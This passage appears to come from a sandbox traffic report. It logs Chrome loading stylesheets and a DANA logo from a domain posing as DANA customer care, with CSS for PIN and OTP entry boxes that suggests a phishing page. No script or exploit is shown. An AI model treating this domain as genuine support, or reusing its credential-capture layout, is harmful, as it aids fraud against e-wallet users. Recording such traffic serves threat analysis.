                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nSARzHjxnn4IDrInaye9T6BWluswSdLXpPMiin3c%2Bj1FBkbxuT%2FlzrvCtLLJgGM1Ll%2BUJ6opdQl2BJe7LKIMZMcSPqmYGF9nqNPker0vHGujZVGQ3xNYU0bLVVHNo7F48uST9zW2vXuDX8%2BXHOdvQy4MnsJOl%2FCwr3s%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d2113218bb84357-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:26 UTC666INData Raw: 2e 62 6f 78 2d 69 6e 70 75 74 2d 70 69 6e 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 34 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 62 6f 78 2d 69 6e 70 75 74 2d 70 69 6e 20 69 6e 70 75 74 20 7b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 77 69 64 74 68 3a 20 34 30 70 78 3b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 33 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20
                                                  Data Ascii: .box-input-pin {width: 100%;height: 45px;margin-top: 50px;display: flex;justify-content: center;align-items: center;}.box-input-pin input {height: 100%;width: 40px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;justify-content:


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.449751172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC617OUTGET /ast/6990a7033bbaeadc2040ac863ff124fd.css HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC703INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Content-Type: text/css
                                                  Content-Length: 1255
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:21:02 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2FSmfHi%2FcIcbmTKdv%2FZTVggcCOVEwvdJ5IEI6LXmUaoG3A%2BE%2FYDDZ5t5NcDwKp46qt%2Bs%2BDYFHjQG%2F6i13GCdDTwt0n%2BwJLJTNjHWxNSlEFEhha%2BQuKp4eFpfkGlDB6dd2zb8u0OfljBT2fBweyUqVXzLqhEN46z6o9Q%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d211321adbd4382-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:26 UTC666INData Raw: 2e 62 67 6f 74 70 20 7b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 72 69 67 68 74 3a 20 30 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 30 30 30 33 32 3b 7d 2e 62 67 6f 74 70 20 66 6f 72 6d 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 20 30 3b 68 65 69 67 68 74 3a 20 35 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 35 30 25 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 6c 65 66 74 2d 72 61 64 69 75 73 3a 20 31 35 70
                                                  Data Ascii: .bgotp {position: absolute;z-index: 9999;top: 0;left: 0;right: 0;width: 100%;height: 100%;background: #00000032;}.bgotp form {width: 100%;position: absolute;bottom: 0;height: 50%;min-height: 50%;max-height: 50%;background: #fff;border-top-left-radius: 15p
                                                  2024-10-13 17:33:26 UTC589INData Raw: 30 25 3b 68 65 69 67 68 74 3a 20 34 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 35 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 62 6f 78 2d 69 6e 70 75 74 2d 6f 74 70 20 69 6e 70 75 74 20 7b 68 65 69 67 68 74 3a 20 34 35 70 78 3b 77 69 64 74 68 3a 20 34 35 70 78 3b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 33 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 36 66 36 66 36 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65
                                                  Data Ascii: 0%;height: 45px;margin-top: 35px;display: flex;justify-content: center;align-items: center;}.box-input-otp input {height: 45px;width: 45px;border: none;outline: none;border-radius: 8px;margin: 0 3px;display: flex;background: #f6f6f6;justify-content: cente


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.449749172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC617OUTGET /ast/3fadc676582b9542004b502ee03df3a3.css HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC691INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Content-Type: text/css
                                                  Content-Length: 1561
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:18:54 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PgKEsqbO84BTlFsL6fpNKz2ewbW%2FTUGU1KVA9aG2HfO%2F7Gd9jpg4tYTt6Ew%2BykFAGJFTIBvwVLi43cwgvDRj6he%2BLCrpd81AsqQD9ovh4Atb3op8V5BZqAt4KWKXnlWtam0CVF7Mw9C8Uohpo0NOOkufxoE2lFNFDnU%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d211321af997cee-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:26 UTC678INData Raw: 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 2e 70 72 6f 63 65 73 73 20 7b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 72 69 67 68 74 3a 20 30 3b 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 30 30 30 30 30 30 35 62 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 39 39 39 39 39 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 2e 6c 6f 61 64 69 6e 67 20 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 64 69 73 70 6c 61 79 3a 20 66
                                                  Data Ascii: /*********************/.process {top: 0;left: 0;right: 0;position: fixed;display: flex;justify-content: center;align-items: center;background: #0000005b;z-index: 999999999;width: 100%;height: 100%;}.loading {margin-top: -50px;position: absolute;display: f
                                                  2024-10-13 17:33:26 UTC883INData Raw: 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 6c 6f 61 64 69 6e 67 4f 74 70 20 69 6d 67 20 7b 77 69 64 74 68 3a 20 35 30 70 78 3b 7d 2e 6c 6f 61 64 69 6e 67 4f 74 70 20 2e 73 70 69 6e 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 20 33 35 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 2d 6d 6f 7a 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 2d 6d 73 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 31 73 20
                                                  Data Ascii: nt: center;align-items: center;}.loadingOtp img {width: 50px;}.loadingOtp .spinner{position: absolute;width: 35px;animation: spin 1s linear infinite;-webkit-animation: spin 1s linear infinite;-moz-animation: spin 1s linear infinite;-ms-animation: spin 1s


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.449752172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC617OUTGET /ast/47e4c58f6b9789b8a33f2525cf084599.css HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC686INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Content-Type: text/css
                                                  Content-Length: 790
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:20:22 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7077
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KeRt%2BNaWSrQnp1PrzK7TXg5KRdC7SIrQHsWggx9WA31EElG1xnKFzktzmKVntFL1aTaVO4%2BQuMYWtsDKCjnCKpmQjnyKHiFvPQ4ZGyxsrefbQdcBhfTYtI0fMuxseSZRR4uF4t5rexLbCJKArs0FHfGFAwM6R4qLhrc%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d211321bdae433e-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:26 UTC683INData Raw: 2e 69 6e 64 65 78 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 31 31 38 45 45 41 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 39 3b 7d 2e 69 6e 64 65 78 20 2e 68 65 72 6f 20 7b 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 30 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 33 33 30 70 78 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 2e 69 6e 64 65 78 20 2e 68 65 72 6f 20 69 6d 67 20 7b 77 69 64 74 68 3a 20 39 30 25 3b 7d 2e 69 6e 64 65 78 20 2e 63 6f 6e 74 65 6e 74 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                                                  Data Ascii: .index {width: 100%;height: 100%;background: #118EEA;z-index: 9999;}.index .hero {margin: 20px 0;width: 100%;height: 330px;display: flex;justify-content: center;align-items: center;}.index .hero img {width: 90%;}.index .content {width: 100%;text-align: ce
                                                  2024-10-13 17:33:26 UTC107INData Raw: 6e 64 3a 20 23 66 66 66 3b 63 6f 6c 6f 72 3a 20 23 31 31 38 45 45 41 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 20 2e 32 73 3b 7d
                                                  Data Ascii: nd: #fff;color: #118EEA;font-size: 16px;font-weight: 600;border: none;border-radius: 10px;transition: .2s;}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449753172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC644OUTGET /ast/img/dana_logo.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC691INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 12786
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:22:12 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7074
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HCvM2uBeERNn7sKL72CxvQzcUwLO3utbMAXPixpM9NyhXlwQeIkw1fuRtavtKMNLCHMzj1mpd3ORlvnUoDiV%2FtXG4TBsvs%2Fg6myE3wmtfliKK1GA6Sxfu%2FBqmwMMs3Kllc6w68wNJD7dCbgK2yohQN99LLnAKEhCxE0%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d211321aad78c0c-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:26 UTC678INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 7e 00 00 00 70 08 06 00 00 01 6e a0 2b ae 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 31 a9 49 44 41 54 78 01 ed 7d 07 98 15 35 f7 fe b2 bb b0 2c 20 bd f7 ce d2 55 ba 4a 11 41 fe a0 58 10 44 f4 93 ce 27 a0 a8 88 20 cd f2 47 11 01 0b f8 09 08 82 52 a4 88 22 45 a4 23 8a 52 94 8e d2 41 a9 d2 9b ac c0 52 96 df 7b 2e e4 92 9d 9b 99 49 e6 ce 6d bb b9 cf b3 3b 33 c9 c9 c9 c9 9b 4c 26 39 39 39 89 8a 32 f9 8d 18 31 a2 dc b9 73 e7 fe 31 89 0e 9b e0 74 46 49 6e e0 67 0c 63 cf e9 f0 63 f7 e1 72 8d 66 82 f4 ed db b7 a4 95 f0 44 67 17 cf 78 05 f3 ea 45 54 45 b8 70 aa 09 4f 0d a8 08 4f e8 fe f1 c7 1f 0b 78 94 29 3d ff e3 e3 d8 fd 8e 1d 3b 96 da d1 d8 c5 9f 3c 79 72 bf 90 86 05 22 b3 f4 ec 9e ae 2c 73 76
                                                  Data Ascii: PNGIHDR~pn+gAMAa1IDATx}5, UJAXD' GR"E#RAR{.Im;3L&99921s1tFIngccrfDgxETEpOOx)=;<yr",sv
                                                  2024-10-13 17:33:26 UTC1369INData Raw: a2 bc 57 61 3c 1f c8 df 7f f0 c1 07 65 bd 29 6f dd b0 78 3c c6 b2 38 16 b6 68 d1 a2 ba ec fe e0 c1 83 bb 59 3c 5d 59 38 46 ac 8d d9 3d 1f ff de 7b ef 55 a6 f0 2b 57 ae dc f8 ed b7 df 86 8b 68 58 18 8d 7a d9 bd 87 07 7b a0 2b cf 54 74 cf 68 2f 5d ba 64 3a c8 3a 71 e2 c4 31 23 2f d1 33 86 02 a7 59 1e 8c 2f 7b 1e 35 6a d4 3d a2 34 2c 9e ae 14 8f f9 c1 32 2f 3a c6 04 3c 31 bb 27 1a f6 33 86 b1 67 ba 12 8d dd 33 3a 04 2f 8d 91 a7 2c 0f 4a e7 6d 0a 7c 86 76 f7 18 a7 5f 34 a3 b9 76 ed 9a 57 30 9e 86 32 e3 9f 9d dc 8b 78 58 16 80 4f 70 f9 f2 e5 6b 2c d3 ec d9 b3 67 66 f7 ec 7a f6 ec d9 3d 08 2f 4d cf b3 67 cf 1e c8 c2 d9 95 8d 22 e9 f9 e9 a7 9f 5e cf c2 55 ae a6 3c 48 50 95 1f 9f a9 31 5d b7 6e dd ca f1 f1 74 4f 34 7c 18 3d bb d5 84 3c 1f 25 63 06 7c 66 c6 fb 70
                                                  Data Ascii: Wa<e)ox<8hY<]Y8F={U+WhXz{+Tth/]d::q1#/3Y/{5j=4,2/:<1'3g3:/,Jm|v_4vW02xXOpk,gfz=/Mg"^U<HP1]ntO4|=<%c|fp
                                                  2024-10-13 17:33:26 UTC1369INData Raw: f0 6d ea 64 15 4f 3c b0 b5 ad 88 15 cd ba 75 eb de 4b 11 cf 3f f0 f7 c4 cc 8f 5f 36 9e 17 bb 17 f1 b3 03 9f d2 b0 f4 74 15 f1 c0 e2 fd e7 8c 06 ad ec ff 8b 68 58 bc 19 8f bf fe fa 6b 05 a3 c1 db d1 c1 09 0f 7c 57 0e 32 1e 64 b5 6d cb 83 11 1b af a2 84 0a 61 66 e0 fb 58 4a b8 01 3e 80 db c9 e4 cf 9b 37 af f0 db 70 fd fa 75 46 22 ac 40 7c 4c 8f 33 02 94 53 68 43 cd e2 e9 2a c2 02 dd 93 97 44 14 4f 61 5e 02 dc 78 c7 f9 66 c4 6e 86 e7 cb 97 2f bd 13 7e 86 ee 26 a8 32 3b 91 57 36 8d b0 86 65 13 ab d2 c1 62 cd 74 7b 80 15 2f 8c 54 78 f3 44 4b 0b 85 6d db b6 ad 42 a3 ba 6e e4 47 fb 8c 82 f9 c3 9b 44 6b e2 96 99 06 15 7c 08 23 7c 5d dd 04 25 77 ee dc a5 dc e4 e7 94 17 86 a5 09 76 69 a3 b7 6f df 6e 3a fb b4 4b cc c5 c7 55 ad 5a d5 d1 5c 81 e3 21 bc a5 3e 92 45 ec
                                                  Data Ascii: mdO<uK?_6thXk|W2dmafXJ>7puF"@|L3ShC*DOa^xfn/~&2;W6ebt{/TxDKmBnGDk|#|]%wvion:KUZ\!>E
                                                  2024-10-13 17:33:26 UTC1369INData Raw: 7b 0a 47 66 79 8b 2d 9f cf f1 69 d9 3d 86 3f d2 d6 72 30 71 f1 6e dd 64 e9 e9 8a 46 f9 be 65 e6 5c 24 3a 97 11 7c 5a 76 0f 4d e4 61 8e cc f2 16 f3 a0 14 1b b5 19 0f 8c 40 3a 50 42 e9 06 45 09 2d 73 0a 7c 64 40 64 f5 b7 f1 53 b1 61 2a 5f 8f 01 cb 5f e1 fb c2 7b 0a 93 1d 3c 50 36 ac e1 d3 b2 fb 27 9e 78 22 c1 2e 2d 1f cf d2 f1 57 1a 72 f2 34 56 f7 18 5b 1f e0 d3 b2 7b f8 6b cd 65 95 ce 10 e7 71 95 c0 d2 b2 ab 8a b9 29 68 85 0d 17 f9 78 e7 aa 86 3c 7d 1e b1 0b 2a 3b cb 9b bf 62 68 7c 34 1a de 1b 9f f6 49 91 4a 02 68 92 14 ac a2 0c 1e 3c 78 25 3a 46 9f cf 3a 7c 8f e4 94 95 21 36 36 36 87 88 16 c3 52 25 7f e5 18 8a fa b0 81 02 21 85 66 cf 87 80 0b 80 c6 58 b8 7a 8e c6 a8 a2 02 17 76 94 66 bc b9 ec bd b7 16 b4 42 de de 84 dc 0d 74 06 ff 70 8f de db 5c b9 72 e5
                                                  Data Ascii: {Gfy-i=?r0qndFe\$:|ZvMa@:PBE-s|d@dSa*__{<P6'x".-Wr4V[{keq)hx<}*;bh|4IJh<x%:F:|!666R%!fXzvfBtp\r
                                                  2024-10-13 17:33:26 UTC1369INData Raw: 2f 06 09 d9 e0 91 21 11 ea f0 df 60 93 35 b9 43 87 0e 6b fd 64 2f 9d 7c f2 e4 c9 b5 2a 54 a8 d0 b6 64 c9 92 b5 e0 ab 28 0b ea e7 3c 94 34 ab 7e fd f5 d7 89 38 3f 62 ab 34 23 22 8c a4 13 18 45 f3 02 72 25 a2 54 e0 9b c4 a6 4e 8d 44 79 f0 61 70 aa 74 65 c1 82 05 01 f7 d3 83 ca 1c c6 e7 6b 76 0f 73 f1 25 28 52 9c 03 0c a4 92 c0 f2 56 ea 64 9c 9d 3b 77 52 c7 90 a2 63 95 ca 40 92 68 f7 ee dd df 98 61 c0 87 c3 a3 87 9c 3a bc 73 e7 ce 25 f8 84 91 7a 8f 33 bc a8 f7 57 f9 39 6e fc 0c 23 3a 86 68 f8 f0 e1 b5 54 32 95 a1 85 db f3 2a 22 ef 6b 2c 5f b3 eb a2 45 8b 5e 92 e1 2f 4b 83 03 e0 ea 9b e5 65 15 3e 67 ce 1c 57 dd df cf 9b 37 af 8d 55 7e 66 71 13 27 4e bc d7 b2 ac f8 7c 6e 31 4b 1c c8 70 f2 12 87 2d 8b ab 70 18 5d 57 aa ec 0f 3e f8 a0 c8 d0 a1 43 cb 63 77 57 27
                                                  Data Ascii: /!`5Ckd/|*Td(<4~8?b4#"Er%TNDyaptekvs%(RVd;wRc@ha:s%z3W9n#:hT2*"k,_E^/Ke>gW7U~fq'N|n1Kp-p]W>CcwW'
                                                  2024-10-13 17:33:26 UTC1369INData Raw: 57 bd 7a f5 06 a2 70 63 58 e3 c6 8d 85 56 a9 e8 b9 94 c6 eb 18 3a 1d 31 f2 a6 67 68 85 72 8a c2 8d 61 b0 1b 32 93 e3 84 91 d6 ea 19 13 4e 21 3d ec 81 bc aa 46 ab f4 f0 07 25 34 53 c7 c4 ff 6f ab 74 c6 38 e0 77 ca 18 46 cf 70 c6 90 10 0d 15 a7 f0 4d 17 25 88 a4 30 f8 06 15 82 17 a8 32 40 fd 28 ec 91 a0 fe 2b 17 a8 3c 03 c1 57 75 78 a3 2a 03 f8 ab 26 f1 8b 1e aa 6a b3 f4 37 a4 c7 a3 66 1c c2 38 dc b4 d4 81 90 19 7a e6 f3 22 be b4 30 20 0a d7 61 a1 47 20 1a 9f c9 73 a1 17 c3 7d 09 60 33 74 c9 7d ae e6 1c 61 50 57 4a 14 8b b9 c0 49 51 78 a0 c2 68 92 18 28 de e1 c0 57 b5 7c e8 f9 4d f1 88 c5 18 8a c6 66 c2 c9 56 38 14 d6 a9 0c d0 0a 28 4d 14 9d e6 c3 d2 61 6c df 86 dd f3 57 ac d8 6e e4 9f 55 ef 31 2c 2d 81 c9 e6 4e 54 ba d4 97 0c c3 3d a9 b1 bd aa 1c e1 42 0f
                                                  Data Ascii: WzpcXV:1ghra2N!=F%4Sot8wFpM%02@(+<Wux*&j7f8z"0 aG s}`3t}aPWJIQxh(W|MfV8(MalWnU1,-NT=B
                                                  2024-10-13 17:33:26 UTC1369INData Raw: 4b 6b 15 a4 cb 1b 60 04 a0 05 0a e9 a1 d4 b0 41 1a 15 e0 22 6a f6 1a 01 73 04 e0 ec a7 29 19 b6 05 f3 07 0f 13 97 9f 7b ee b9 aa e6 52 e9 18 8d 40 10 11 80 df ce 89 c1 78 01 68 7f 6c 10 8b a5 b3 d2 08 48 23 90 01 46 5d 13 c8 34 c0 cd 1f cc ab 93 d1 e8 07 49 4b a1 09 35 02 a1 44 e0 dd 77 df 6d 86 23 22 37 38 7d 11 d0 e0 6f 60 eb df 0a b8 9f ae 13 ca 72 e8 bc d3 0e 02 56 8b 5c 8e 51 a0 4d e8 4f 3d f5 14 1d df d3 18 be 2a 2b 67 c9 92 25 0f b6 05 66 27 03 3b 18 6e 5d c7 e1 05 e7 b1 82 7c 0c c6 68 9b 31 89 5e 0c 43 aa c5 30 62 3a ee 38 43 9d 50 23 e0 00 81 80 34 7e 07 72 d8 26 79 e0 81 07 f2 bd f8 e2 8b a5 61 37 5f 15 8b 5b 95 f3 e6 cd 5b 1e e6 bb 05 b0 8f 20 17 ac 50 b3 c6 c7 c7 a7 37 b7 5e bd cd 9e ac 26 b1 c7 16 c6 ab 97 48 75 7b 0a 5f 9c 83 78 09 77 60 52
                                                  Data Ascii: Kk`A"js){R@xhlH#F]4IK5Dwm#"78}o`rV\QMO=*+g%f';n]|h1^C0b:8CP#4~r&ya7_[[ P7^&Hu{_xw`R
